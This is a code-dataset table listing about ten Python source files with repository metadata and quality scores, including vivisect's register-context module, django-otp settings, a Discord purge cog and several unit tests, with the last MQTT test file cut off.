max_stars_repo_path
stringlengths 5
128
| max_stars_repo_name
stringlengths 8
105
| max_stars_count
int64 0
41.3k
| id
stringlengths 5
5
| content
stringlengths 19
155k
| content_cleaned
stringlengths 17
155k
| language
stringclasses 18
values | language_score
float64 0.05
1
| edu_score
float64 0.76
4.4
| edu_int_score
int64 1
4
|
---|---|---|---|---|---|---|---|---|---|
lmctl/project/mutate/base.py | manojn97/lmctl | 3 | 13500 | import abc
class Mutator(abc.ABC):
def apply(self, original_content):
return original_content
| import abc
class Mutator(abc.ABC):
def apply(self, original_content):
return original_content
| none | 1 | 3.110995 | 3 |
src/django_otp/conf.py | jaap3/django-otp | 318 | 13501 | <filename>src/django_otp/conf.py
import django.conf
class Settings:
"""
This is a simple class to take the place of the global settings object. An
instance will contain all of our settings as attributes, with default values
if they are not specified by the configuration.
"""
defaults = {
'OTP_LOGIN_URL': django.conf.settings.LOGIN_URL,
'OTP_ADMIN_HIDE_SENSITIVE_DATA': False,
}
def __getattr__(self, name):
if name in self.defaults:
return getattr(django.conf.settings, name, self.defaults[name])
else:
return getattr(django.conf.settings, name)
settings = Settings()
| <filename>src/django_otp/conf.py
import django.conf
class Settings:
"""
This is a simple class to take the place of the global settings object. An
instance will contain all of our settings as attributes, with default values
if they are not specified by the configuration.
"""
defaults = {
'OTP_LOGIN_URL': django.conf.settings.LOGIN_URL,
'OTP_ADMIN_HIDE_SENSITIVE_DATA': False,
}
def __getattr__(self, name):
if name in self.defaults:
return getattr(django.conf.settings, name, self.defaults[name])
else:
return getattr(django.conf.settings, name)
settings = Settings()
| pt | 0.144566 | 3.088048 | 3 |
Moderation/purge.py | DevFlock/Multis | 3 | 13502 | import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.core import has_permissions
class cog(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=["clear"])
@has_permissions(ban_members=True)
async def purge(self, ctx, count):
await ctx.channel.purge(limit=count+1)
message = await ctx.send(f"Deleted {count} messages.")
asyncio.sleep(2)
await message.delete()
def setup(client):
client.add_cog(cog(client))
| import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.core import has_permissions
class cog(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=["clear"])
@has_permissions(ban_members=True)
async def purge(self, ctx, count):
await ctx.channel.purge(limit=count+1)
message = await ctx.send(f"Deleted {count} messages.")
asyncio.sleep(2)
await message.delete()
def setup(client):
client.add_cog(cog(client))
| none | 1 | 2.432014 | 2 |
tensorboard/acceptance/__init__.py | DeepLearnI/atlas | 296 | 13503 | from .test_tensorboard_rest_api import TestTensorboardRestAPI
from .test_tensorboard_server import TestTensorboardServer
from .test_tensorboard_endpoints import TestTensorboardEndpoint | from .test_tensorboard_rest_api import TestTensorboardRestAPI
from .test_tensorboard_server import TestTensorboardServer
from .test_tensorboard_endpoints import TestTensorboardEndpoint | none | 1 | 0.991267 | 1 |
tests/store/test_fetch_purchases_to_ship.py | yuzi-ziyu/alphasea-agent | 1 | 13504 | from unittest import TestCase
from ..helpers import (
create_web3,
create_contract,
get_future_execution_start_at_timestamp,
proceed_time,
get_prediction_time_shift,
get_purchase_time_shift,
get_shipping_time_shift,
get_publication_time_shift,
get_tournament_id,
get_chain_id,
create_store,
generate_redis_namespace,
BaseHardhatTestCase
)
from src.web3 import get_account_address
execution_start_at = get_future_execution_start_at_timestamp()
content = 'abc'.encode()
model_id = 'model1'
model_id_other = 'model_other'
class TestStoreFetchPurchasesToShip(BaseHardhatTestCase):
def setUp(self):
super().setUp()
w3 = create_web3()
contract = create_contract(w3)
store = create_store(w3, contract)
self.store = store
self.w3 = w3
w3_other = create_web3(account_index=1)
contract_other = create_contract(w3_other)
store_other = create_store(w3_other, contract_other)
w3_purchaser = create_web3(account_index=2)
contract_purchaser = create_contract(w3_purchaser)
store_purchaser = create_store(w3_purchaser, contract_purchaser)
self.store_purchaser = store_purchaser
self.w3_purchaser = w3_purchaser
# predict
proceed_time(w3, execution_start_at + get_prediction_time_shift())
store.create_models_if_not_exist([dict(
model_id=model_id,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store.create_predictions([dict(
model_id=model_id,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# other predict
store_other.create_models_if_not_exist([dict(
model_id=model_id_other,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store_other.create_predictions([dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# purchase
proceed_time(w3, execution_start_at + get_purchase_time_shift())
store_purchaser.create_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
), dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
)])
def test_ok(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [{
**purchases[0],
'model_id': model_id,
'execution_start_at': execution_start_at,
'purchaser': get_account_address(self.w3_purchaser.eth.default_account),
}])
def test_different_tournament_id(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id='different',
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [])
def test_different_execution_start_at(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at + 1,
)
self.assertEqual(purchases, [])
def test_already_shipped(self):
store = self.store
# ship
proceed_time(self.w3, execution_start_at + get_shipping_time_shift())
store.ship_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
purchaser=get_account_address(self.w3_purchaser.eth.default_account),
)])
purchases = store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at,
)
self.assertEqual(purchases, [])
| from unittest import TestCase
from ..helpers import (
create_web3,
create_contract,
get_future_execution_start_at_timestamp,
proceed_time,
get_prediction_time_shift,
get_purchase_time_shift,
get_shipping_time_shift,
get_publication_time_shift,
get_tournament_id,
get_chain_id,
create_store,
generate_redis_namespace,
BaseHardhatTestCase
)
from src.web3 import get_account_address
execution_start_at = get_future_execution_start_at_timestamp()
content = 'abc'.encode()
model_id = 'model1'
model_id_other = 'model_other'
class TestStoreFetchPurchasesToShip(BaseHardhatTestCase):
def setUp(self):
super().setUp()
w3 = create_web3()
contract = create_contract(w3)
store = create_store(w3, contract)
self.store = store
self.w3 = w3
w3_other = create_web3(account_index=1)
contract_other = create_contract(w3_other)
store_other = create_store(w3_other, contract_other)
w3_purchaser = create_web3(account_index=2)
contract_purchaser = create_contract(w3_purchaser)
store_purchaser = create_store(w3_purchaser, contract_purchaser)
self.store_purchaser = store_purchaser
self.w3_purchaser = w3_purchaser
# predict
proceed_time(w3, execution_start_at + get_prediction_time_shift())
store.create_models_if_not_exist([dict(
model_id=model_id,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store.create_predictions([dict(
model_id=model_id,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# other predict
store_other.create_models_if_not_exist([dict(
model_id=model_id_other,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store_other.create_predictions([dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# purchase
proceed_time(w3, execution_start_at + get_purchase_time_shift())
store_purchaser.create_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
), dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
)])
def test_ok(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [{
**purchases[0],
'model_id': model_id,
'execution_start_at': execution_start_at,
'purchaser': get_account_address(self.w3_purchaser.eth.default_account),
}])
def test_different_tournament_id(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id='different',
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [])
def test_different_execution_start_at(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at + 1,
)
self.assertEqual(purchases, [])
def test_already_shipped(self):
store = self.store
# ship
proceed_time(self.w3, execution_start_at + get_shipping_time_shift())
store.ship_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
purchaser=get_account_address(self.w3_purchaser.eth.default_account),
)])
purchases = store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at,
)
self.assertEqual(purchases, [])
| it | 0.141563 | 2.148052 | 2 |
tests/test_add_option_backtrace.py | ponponon/loguru | 11,391 | 13505 | <reponame>ponponon/loguru<gh_stars>1000+
from loguru import logger
# See "test_catch_exceptions.py" for extended testing
def test_backtrace(writer):
logger.add(writer, format="{message}", backtrace=True)
try:
1 / 0
except Exception:
logger.exception("")
result_with = writer.read().strip()
logger.remove()
writer.clear()
logger.add(writer, format="{message}", backtrace=False)
try:
1 / 0
except Exception:
logger.exception("")
result_without = writer.read().strip()
assert len(result_with.splitlines()) > len(result_without.splitlines())
| from loguru import logger
# See "test_catch_exceptions.py" for extended testing
def test_backtrace(writer):
logger.add(writer, format="{message}", backtrace=True)
try:
1 / 0
except Exception:
logger.exception("")
result_with = writer.read().strip()
logger.remove()
writer.clear()
logger.add(writer, format="{message}", backtrace=False)
try:
1 / 0
except Exception:
logger.exception("")
result_without = writer.read().strip()
assert len(result_with.splitlines()) > len(result_without.splitlines()) | it | 0.24827 | 2.834776 | 3 |
BasicPythonPrograms/PythonDestructor.py | Pushkar745/PythonProgramming | 0 | 13506 | <reponame>Pushkar745/PythonProgramming<gh_stars>0
class Employee:
#Initializaing
def __init__(self):
print('Employee created ')
#Deleting (Calling destructor)
def __del__(self):
print('Destructor called,Employee deleted')
obj=Employee()
del obj | class Employee:
#Initializaing
def __init__(self):
print('Employee created ')
#Deleting (Calling destructor)
def __del__(self):
print('Destructor called,Employee deleted')
obj=Employee()
del obj | it | 0.099496 | 3.459575 | 3 |
envi/registers.py | ConfusedMoonbear/vivisect | 1 | 13507 | <reponame>ConfusedMoonbear/vivisect
"""
Similar to the memory subsystem, this is a unified way to
access information about objects which contain registers
"""
import envi.bits as e_bits
from envi.const import *
class InvalidRegisterName(Exception):
pass
class RegisterContext:
def __init__(self, regdef=(), metas=(), pcindex=None, spindex=None, srindex=None):
"""
Hand in a register definition which consists of
a list of (<name>, <width>) tuples.
"""
self.loadRegDef(regdef)
self.loadRegMetas(metas)
self.setRegisterIndexes(pcindex, spindex, srindex=srindex)
self._rctx_dirty = False
def getRegisterSnap(self):
"""
Use this to bulk save off the register state.
"""
return list(self._rctx_vals)
def setRegisterSnap(self, snap):
"""
Use this to bulk restore the register state.
NOTE: This may only be used under the assumption that the
RegisterContext has been initialized the same way
(like context switches in tracers, or emulaction snaps)
"""
self._rctx_vals = list(snap)
def isDirty(self):
"""
Returns true if registers in this context have been modififed
since their import.
"""
return self._rctx_dirty
def setIsDirty(self, bool):
self._rctx_dirty = bool
def setRegisterIndexes(self, pcindex, spindex, srindex=None):
self._rctx_pcindex = pcindex
self._rctx_spindex = spindex
self._rctx_srindex = srindex
def loadRegDef(self, regdef, defval=0):
"""
Load a register definition. A register definition consists
of a list of tuples with the following format:
(regname, regwidth)
NOTE: All widths in envi RegisterContexts are in bits.
"""
self._rctx_regdef = regdef # Save this for snaps etc..
self._rctx_names = {}
self._rctx_ids = {}
self._rctx_widths = []
self._rctx_vals = []
self._rctx_masks = []
for i, (name, width) in enumerate(regdef):
self._rctx_names[name] = i
self._rctx_ids[i] = name
self._rctx_widths.append(width)
self._rctx_masks.append((2**width)-1)
self._rctx_vals.append(defval)
def getRegDef(self):
return self._rctx_regdef
def loadRegMetas(self, metas, statmetas=None):
"""
Load a set of defined "meta" registers for this architecture. Meta
registers are defined as registers who exist as a subset of the bits
in some other "real" register. The argument metas is a list of tuples
with the following format:
(regname, regidx, reg_shift_offset, reg_width)
The given example is for the AX register in the i386 subsystem
regname: "ax"
reg_shift_offset: 0
reg_width: 16
Optionally a set of status meta registers can be loaded as well.
The argument is a list of tuples with the following format:
(regname, regidx, reg_shift_offset, reg_width, description)
"""
self._rctx_regmetas = metas
for name, idx, offset, width in metas:
self.addMetaRegister(name, idx, offset, width)
self._rctx_statmetas = statmetas
def addMetaRegister(self, name, idx, offset, width):
"""
Meta registers are registers which are really just directly
addressable parts of already existing registers (eax -> al).
To add a meta register, you give the name, the idx of the *real*
register, the width of the meta reg, and it's left shifted (in bits)
offset into the real register value. The RegisterContext will take
care of accesses after that.
"""
newidx = (offset << 24) + (width << 16) + idx
self._rctx_names[name] = newidx
self._rctx_ids[newidx] = name
def isMetaRegister(self, index):
return (index & 0xffff) != index
def _rctx_Import(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, populate our values from it.
NOTE: This also clears the dirty flag
"""
# On import from a structure, we are clean again.
self._rctx_dirty = False
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
x = getattr(sobj, name, None)
if x != None:
self._rctx_vals[idx] = x
def _rctx_Export(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, set the ones he has to match
our values.
"""
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
if hasattr(sobj, name):
setattr(sobj, name, self._rctx_vals[idx])
def getRegisterInfo(self, meta=False):
"""
Return an object which can be stored off, and restored
to re-initialize a register context. (much like snapshot
but it takes the definitions with it)
"""
regdef = self._rctx_regdef
regmeta = self._rctx_regmetas
pcindex = self._rctx_pcindex
spindex = self._rctx_spindex
snap = self.getRegisterSnap()
return (regdef, regmeta, pcindex, spindex, snap)
def setRegisterInfo(self, info):
regdef, regmeta, pcindex, spindex, snap = info
self.loadRegDef(regdef)
self.loadRegMetas(regmeta)
self.setRegisterIndexes(pcindex, spindex)
self.setRegisterSnap(snap)
def getRegisterName(self, index):
return self._rctx_ids.get(index,"REG%.8x" % index)
def getProgramCounter(self):
"""
Get the value of the program counter for this register context.
"""
return self.getRegister(self._rctx_pcindex)
def setProgramCounter(self, value):
"""
Set the value of the program counter for this register context.
"""
self.setRegister(self._rctx_pcindex, value)
def getStackCounter(self):
return self.getRegister(self._rctx_spindex)
def setStackCounter(self, value):
self.setRegister(self._rctx_spindex, value)
def hasStatusRegister(self):
'''
Returns True if this context is aware of a status register.
'''
if self._rctx_srindex == None:
return False
return True
def getStatusRegNameDesc(self):
'''
Return a list of status register names and descriptions.
'''
return [(name, desc) for name, idx, offset, width, desc in self._rctx_statmetas]
def getStatusRegister(self):
'''
Gets the status register for this register context.
'''
return self.getRegister(self._rctx_srindex)
def setStatusRegister(self, value):
'''
Sets the status register for this register context.
'''
self.setRegister(self._rctx_srindex, value)
def getStatusFlags(self):
'''
Return a dictionary of reg name and reg value for the meta registers
that are part of the status register.
'''
ret = {}
for name, idx, offset, width, desc in self._rctx_statmetas:
ret[name] = self.getRegisterByName(name)
return ret
def getRegisterByName(self, name):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
return self.getRegister(idx)
def setRegisterByName(self, name, value):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
self.setRegister(idx, value)
def getRegisterNames(self):
'''
Returns a list of the 'real' (non meta) registers.
'''
regs = [rname for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisterNameIndexes(self):
'''
Return a list of all the 'real' (non meta) registers and their indexes.
Example: for regname, regidx in x.getRegisterNameIndexes():
'''
regs = [(rname, ridx) for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisters(self):
"""
Get all the *real* registers from this context as a dictionary of name
value pairs.
"""
ret = {}
for name,idx in self._rctx_names.items():
if (idx & 0xffff) != idx:
continue
ret[name] = self.getRegister(idx)
return ret
def setRegisters(self, regdict):
"""
For any name value pairs in the specified dictionary, set the current
register values in this context.
"""
for name,value in regdict.items():
self.setRegisterByName(name, value)
def getRegisterIndex(self, name):
"""
Get a register index by name.
(faster to use the index multiple times)
"""
return self._rctx_names.get(name)
def getRegisterWidth(self, index):
"""
Return the width of the register which lives at the specified
index (width is always in bits).
"""
ridx = index & 0xffff
if ridx == index:
return self._rctx_widths[index]
width = (index >> 16) & 0xff
return width
def getRegister(self, index):
"""
Return the current value of the specified register index.
"""
ridx = index & 0xffff
value = self._rctx_vals[ridx]
if ridx != index:
value = self._xlateToMetaReg(index, value)
return value
def getMetaRegInfo(self, index):
'''
Return the appropriate realreg, shift, mask info
for the specified metareg idx (or None if it's not
meta).
Example:
real_reg, lshift, mask = r.getMetaRegInfo(x)
'''
ridx = index & 0xffff
if ridx == index:
return None
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
return ridx, offset, mask
def _xlateToMetaReg(self, index, value):
'''
Translate a register value to the meta register value
(used when getting a meta register)
'''
ridx = index & 0xffff
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
if offset != 0:
value >>= offset
return value & mask
def _xlateToNativeReg(self, index, value):
'''
Translate a register value to the native register value
(used when setting a meta register)
'''
ridx = index & 0xffff
width = (index >> 16) & 0xff
offset = (index >> 24) & 0xff
# FIXME is it faster to generate or look these up?
mask = (2 ** width) - 1
mask = mask << offset
# NOTE: basewidth is in *bits*
basewidth = self._rctx_widths[ridx]
basemask = (2 ** basewidth) - 1
# cut a whole in basemask at the size/offset of mask
finalmask = basemask ^ mask
curval = self._rctx_vals[ridx]
if offset:
value <<= offset
return value | (curval & finalmask)
def setRegister(self, index, value):
"""
Set a register value by index.
"""
self._rctx_dirty = True
ridx = index & 0xffff
# If it's a meta register index, lets mask it into
# the real thing...
if ridx != index:
value = self._xlateToNativeReg(index, value)
self._rctx_vals[ridx] = (value & self._rctx_masks[ridx])
def getRealRegisterNameByIdx(self, regidx):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
(by Index)
"""
return self.getRegisterName(regidx& RMETA_NMASK)
def getRealRegisterName(self, regname):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
"""
ridx = self.getRegisterIndex(regname)
if ridx != None:
return self.getRegisterName(ridx & RMETA_NMASK)
return regname
def addLocalEnums(l, regdef):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all the base registers defined in regdef.
"""
for i,(rname,width) in enumerate(regdef):
l["REG_%s" % rname.upper()] = i
def addLocalStatusMetas(l, metas, statmetas, regname):
'''
Dynamically create data based on the status register meta register
definition.
Adds new meta registers and bitmask constants.
'''
for metaname, idx, offset, width, desc in statmetas:
# create meta registers
metas.append( (metaname, idx, offset, width) )
# create local bitmask constants (EFLAGS_%)
l['%s_%s' % (regname, metaname)] = 1 << offset # TODO: fix for arbitrary width
def addLocalMetas(l, metas):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all meta registers defined in metas.
"""
for name, idx, offset, width in metas:
l["REG_%s" % name.upper()] = (offset << 24) | (width << 16) | idx
| """
Similar to the memory subsystem, this is a unified way to
access information about objects which contain registers
"""
import envi.bits as e_bits
from envi.const import *
class InvalidRegisterName(Exception):
pass
class RegisterContext:
def __init__(self, regdef=(), metas=(), pcindex=None, spindex=None, srindex=None):
"""
Hand in a register definition which consists of
a list of (<name>, <width>) tuples.
"""
self.loadRegDef(regdef)
self.loadRegMetas(metas)
self.setRegisterIndexes(pcindex, spindex, srindex=srindex)
self._rctx_dirty = False
def getRegisterSnap(self):
"""
Use this to bulk save off the register state.
"""
return list(self._rctx_vals)
def setRegisterSnap(self, snap):
"""
Use this to bulk restore the register state.
NOTE: This may only be used under the assumption that the
RegisterContext has been initialized the same way
(like context switches in tracers, or emulaction snaps)
"""
self._rctx_vals = list(snap)
def isDirty(self):
"""
Returns true if registers in this context have been modififed
since their import.
"""
return self._rctx_dirty
def setIsDirty(self, bool):
self._rctx_dirty = bool
def setRegisterIndexes(self, pcindex, spindex, srindex=None):
self._rctx_pcindex = pcindex
self._rctx_spindex = spindex
self._rctx_srindex = srindex
def loadRegDef(self, regdef, defval=0):
"""
Load a register definition. A register definition consists
of a list of tuples with the following format:
(regname, regwidth)
NOTE: All widths in envi RegisterContexts are in bits.
"""
self._rctx_regdef = regdef # Save this for snaps etc..
self._rctx_names = {}
self._rctx_ids = {}
self._rctx_widths = []
self._rctx_vals = []
self._rctx_masks = []
for i, (name, width) in enumerate(regdef):
self._rctx_names[name] = i
self._rctx_ids[i] = name
self._rctx_widths.append(width)
self._rctx_masks.append((2**width)-1)
self._rctx_vals.append(defval)
def getRegDef(self):
return self._rctx_regdef
def loadRegMetas(self, metas, statmetas=None):
"""
Load a set of defined "meta" registers for this architecture. Meta
registers are defined as registers who exist as a subset of the bits
in some other "real" register. The argument metas is a list of tuples
with the following format:
(regname, regidx, reg_shift_offset, reg_width)
The given example is for the AX register in the i386 subsystem
regname: "ax"
reg_shift_offset: 0
reg_width: 16
Optionally a set of status meta registers can be loaded as well.
The argument is a list of tuples with the following format:
(regname, regidx, reg_shift_offset, reg_width, description)
"""
self._rctx_regmetas = metas
for name, idx, offset, width in metas:
self.addMetaRegister(name, idx, offset, width)
self._rctx_statmetas = statmetas
def addMetaRegister(self, name, idx, offset, width):
"""
Meta registers are registers which are really just directly
addressable parts of already existing registers (eax -> al).
To add a meta register, you give the name, the idx of the *real*
register, the width of the meta reg, and it's left shifted (in bits)
offset into the real register value. The RegisterContext will take
care of accesses after that.
"""
newidx = (offset << 24) + (width << 16) + idx
self._rctx_names[name] = newidx
self._rctx_ids[newidx] = name
def isMetaRegister(self, index):
return (index & 0xffff) != index
def _rctx_Import(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, populate our values from it.
NOTE: This also clears the dirty flag
"""
# On import from a structure, we are clean again.
self._rctx_dirty = False
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
x = getattr(sobj, name, None)
if x != None:
self._rctx_vals[idx] = x
def _rctx_Export(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, set the ones he has to match
our values.
"""
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
if hasattr(sobj, name):
setattr(sobj, name, self._rctx_vals[idx])
def getRegisterInfo(self, meta=False):
"""
Return an object which can be stored off, and restored
to re-initialize a register context. (much like snapshot
but it takes the definitions with it)
"""
regdef = self._rctx_regdef
regmeta = self._rctx_regmetas
pcindex = self._rctx_pcindex
spindex = self._rctx_spindex
snap = self.getRegisterSnap()
return (regdef, regmeta, pcindex, spindex, snap)
def setRegisterInfo(self, info):
regdef, regmeta, pcindex, spindex, snap = info
self.loadRegDef(regdef)
self.loadRegMetas(regmeta)
self.setRegisterIndexes(pcindex, spindex)
self.setRegisterSnap(snap)
def getRegisterName(self, index):
return self._rctx_ids.get(index,"REG%.8x" % index)
def getProgramCounter(self):
"""
Get the value of the program counter for this register context.
"""
return self.getRegister(self._rctx_pcindex)
def setProgramCounter(self, value):
"""
Set the value of the program counter for this register context.
"""
self.setRegister(self._rctx_pcindex, value)
def getStackCounter(self):
return self.getRegister(self._rctx_spindex)
def setStackCounter(self, value):
self.setRegister(self._rctx_spindex, value)
def hasStatusRegister(self):
'''
Returns True if this context is aware of a status register.
'''
if self._rctx_srindex == None:
return False
return True
def getStatusRegNameDesc(self):
'''
Return a list of status register names and descriptions.
'''
return [(name, desc) for name, idx, offset, width, desc in self._rctx_statmetas]
def getStatusRegister(self):
'''
Gets the status register for this register context.
'''
return self.getRegister(self._rctx_srindex)
def setStatusRegister(self, value):
'''
Sets the status register for this register context.
'''
self.setRegister(self._rctx_srindex, value)
def getStatusFlags(self):
'''
Return a dictionary of reg name and reg value for the meta registers
that are part of the status register.
'''
ret = {}
for name, idx, offset, width, desc in self._rctx_statmetas:
ret[name] = self.getRegisterByName(name)
return ret
def getRegisterByName(self, name):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
return self.getRegister(idx)
def setRegisterByName(self, name, value):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
self.setRegister(idx, value)
def getRegisterNames(self):
'''
Returns a list of the 'real' (non meta) registers.
'''
regs = [rname for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisterNameIndexes(self):
'''
Return a list of all the 'real' (non meta) registers and their indexes.
Example: for regname, regidx in x.getRegisterNameIndexes():
'''
regs = [(rname, ridx) for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisters(self):
"""
Get all the *real* registers from this context as a dictionary of name
value pairs.
"""
ret = {}
for name,idx in self._rctx_names.items():
if (idx & 0xffff) != idx:
continue
ret[name] = self.getRegister(idx)
return ret
def setRegisters(self, regdict):
"""
For any name value pairs in the specified dictionary, set the current
register values in this context.
"""
for name,value in regdict.items():
self.setRegisterByName(name, value)
def getRegisterIndex(self, name):
"""
Get a register index by name.
(faster to use the index multiple times)
"""
return self._rctx_names.get(name)
def getRegisterWidth(self, index):
"""
Return the width of the register which lives at the specified
index (width is always in bits).
"""
ridx = index & 0xffff
if ridx == index:
return self._rctx_widths[index]
width = (index >> 16) & 0xff
return width
def getRegister(self, index):
"""
Return the current value of the specified register index.
"""
ridx = index & 0xffff
value = self._rctx_vals[ridx]
if ridx != index:
value = self._xlateToMetaReg(index, value)
return value
def getMetaRegInfo(self, index):
'''
Return the appropriate realreg, shift, mask info
for the specified metareg idx (or None if it's not
meta).
Example:
real_reg, lshift, mask = r.getMetaRegInfo(x)
'''
ridx = index & 0xffff
if ridx == index:
return None
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
return ridx, offset, mask
def _xlateToMetaReg(self, index, value):
'''
Translate a register value to the meta register value
(used when getting a meta register)
'''
ridx = index & 0xffff
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
if offset != 0:
value >>= offset
return value & mask
def _xlateToNativeReg(self, index, value):
'''
Translate a register value to the native register value
(used when setting a meta register)
'''
ridx = index & 0xffff
width = (index >> 16) & 0xff
offset = (index >> 24) & 0xff
# FIXME is it faster to generate or look these up?
mask = (2 ** width) - 1
mask = mask << offset
# NOTE: basewidth is in *bits*
basewidth = self._rctx_widths[ridx]
basemask = (2 ** basewidth) - 1
# cut a whole in basemask at the size/offset of mask
finalmask = basemask ^ mask
curval = self._rctx_vals[ridx]
if offset:
value <<= offset
return value | (curval & finalmask)
def setRegister(self, index, value):
"""
Set a register value by index.
"""
self._rctx_dirty = True
ridx = index & 0xffff
# If it's a meta register index, lets mask it into
# the real thing...
if ridx != index:
value = self._xlateToNativeReg(index, value)
self._rctx_vals[ridx] = (value & self._rctx_masks[ridx])
def getRealRegisterNameByIdx(self, regidx):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
(by Index)
"""
return self.getRegisterName(regidx& RMETA_NMASK)
def getRealRegisterName(self, regname):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
"""
ridx = self.getRegisterIndex(regname)
if ridx != None:
return self.getRegisterName(ridx & RMETA_NMASK)
return regname
def addLocalEnums(l, regdef):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all the base registers defined in regdef.
"""
for i,(rname,width) in enumerate(regdef):
l["REG_%s" % rname.upper()] = i
def addLocalStatusMetas(l, metas, statmetas, regname):
'''
Dynamically create data based on the status register meta register
definition.
Adds new meta registers and bitmask constants.
'''
for metaname, idx, offset, width, desc in statmetas:
# create meta registers
metas.append( (metaname, idx, offset, width) )
# create local bitmask constants (EFLAGS_%)
l['%s_%s' % (regname, metaname)] = 1 << offset # TODO: fix for arbitrary width
def addLocalMetas(l, metas):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all meta registers defined in metas.
"""
for name, idx, offset, width in metas:
l["REG_%s" % name.upper()] = (offset << 24) | (width << 16) | idx | pt | 0.177589 | 2.8049 | 3 |
services/nris-api/backend/app/extensions.py | parc-jason/mds | 0 | 13508 | <reponame>parc-jason/mds
from flask_caching import Cache
from flask_jwt_oidc import JwtManager
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from elasticapm.contrib.flask import ElasticAPM
from .config import Config
from .helper import Api
apm = ElasticAPM()
db = SQLAlchemy()
migrate = Migrate()
jwt = JwtManager()
cache = Cache()
api = Api(
prefix=f'{Config.BASE_PATH}',
doc=f'{Config.BASE_PATH}/',
default='nris_api',
default_label='NRIS related operations')
| from flask_caching import Cache
from flask_jwt_oidc import JwtManager
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from elasticapm.contrib.flask import ElasticAPM
from .config import Config
from .helper import Api
apm = ElasticAPM()
db = SQLAlchemy()
migrate = Migrate()
jwt = JwtManager()
cache = Cache()
api = Api(
prefix=f'{Config.BASE_PATH}',
doc=f'{Config.BASE_PATH}/',
default='nris_api',
default_label='NRIS related operations') | none | 1 | 1.886151 | 2 |
tests/test_mqtt_async.py | mpi-sws-rse/antevents-python | 7 | 13509 | <gh_stars>1-10
# Copyright 2017 by MPI-SWS and Data-Ken Research.
# Licensed under the Apache 2.0 License.
"""Test async version of mqtt libraries. Depends on hbmqtt
(https://github.com/beerfactory/hbmqtt)
"""
import unittest
import sys
import asyncio
import string
from random import choice, seed
from antevents.base import Scheduler, SensorPub, SensorEvent
import antevents.linq.output
import antevents.linq.combinators
import antevents.linq.select
from antevents.adapters.mqtt_async import QueueWriter, QueueReader
from antevents.linq.transducer import PeriodicMedianTransducer
from utils import ValueListSensor, ValidateAndStopSubscriber
seed()
try:
import hbmqtt
HBMQTT_AVAILABLE = True
except ImportError:
HBMQTT_AVAILABLE = False
URL = "mqtt://localhost:1883"
VALUES = [
1.0,
2.5,
3.7,
4.1,
8.1,
0.5,
6.5,
